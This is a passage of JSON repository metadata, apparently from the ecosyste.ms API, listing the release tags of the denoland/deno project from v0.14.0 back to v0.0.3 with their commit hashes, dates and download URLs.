s/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fde